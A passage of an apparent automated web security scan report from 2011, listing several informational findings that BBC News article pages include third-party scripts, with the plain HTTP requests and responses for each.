<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.52. http://www.bbc.co.uk/news/world-south-asia-12427518  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427518

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-south-asia-12427518 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:23 GMT
Keep-Alive: timeout=10, max=787
Expires: Sat, 12 Feb 2011 02:03:23 GMT
Connection: close
Set-Cookie: BBC-UID=746da525aeaaf6db3b2a800d01a25310c57ea53000b0317a644b9a840c2e982e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=746da525aeaaf6db3b2a800d01a25310c57ea53000b0317a644b9a840c2e982e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.53. http://www.bbc.co.uk/news/world-south-asia-12437087  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12437087

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-south-asia-12437087 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:24 GMT
Keep-Alive: timeout=10, max=779
Expires: Sat, 12 Feb 2011 02:03:24 GMT
Connection: close
Set-Cookie: BBC-UID=94fd85e52efaf66cdad85d7f6173bc049bd8432170e091195b5b625c6d057ffc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:24 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94fd85e52efaf66cdad85d7f6173bc049bd8432170e091195b5b625c6d057ffc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.54. http://www.bbc.co.uk/news/world-us-canada-12411274  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12411274

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-us-canada-12411274 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:25 GMT
Keep-Alive: timeout=10, max=711
Expires: Sat, 12 Feb 2011 02:03:25 GMT
Connection: close
Set-Cookie: BBC-UID=744db5b56eaa063d8b5b6a6ab17fdd52d231ebbc7010c1297bab929d842f611e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=744db5b56eaa063d8b5b6a6ab17fdd52d231ebbc7010c1297bab929d842f611e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.55. http://www.bbc.co.uk/news/world-us-canada-12435117  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12435117

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-us-canada-12435117 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:26 GMT
Keep-Alive: timeout=10, max=796
Expires: Sat, 12 Feb 2011 02:03:26 GMT
Connection: close
Set-Cookie: BBC-UID=748d25750e6ad6fe495dfa25f13571f953b915d36010812a147b3ae482dc4baa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:26 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=748d25750e6ad6fe495dfa25f13571f953b915d36010812a147b3ae482dc4baa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:26 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.56. http://www.bbc.co.uk/news/world-us-canada-12436383  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12436383

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-us-canada-12436383 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=741
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=b4ad55657efa36cfba5dc7d9515c15bb807de6ef3010618a849b0a34e48c4fd80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4ad55657efa36cfba5dc7d9515c15bb807de6ef3010618a849b0a34e48c4fd80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.57. http://www.bbc.co.uk/news/world-us-canada-12437116  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437116

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-us-canada-12437116 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=795
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=04add535ae8aa68f5b2a628621fedf879dc87227d020711a748bba040cae588e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04add535ae8aa68f5b2a628621fedf879dc87227d020711a748bba040cae588e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 68875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.58. http://www.bbc.co.uk/news/world-us-canada-12437121  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437121

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-us-canada-12437121 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:28 GMT
Keep-Alive: timeout=10, max=772
Expires: Sat, 12 Feb 2011 02:03:28 GMT
Connection: close
Set-Cookie: BBC-UID=e46dd5159e4a37801b1bab7d615fbabda100be42f03071f95b6bf2edc46ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e46dd5159e4a37801b1bab7d615fbabda100be42f03071f95b6bf2edc46ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.c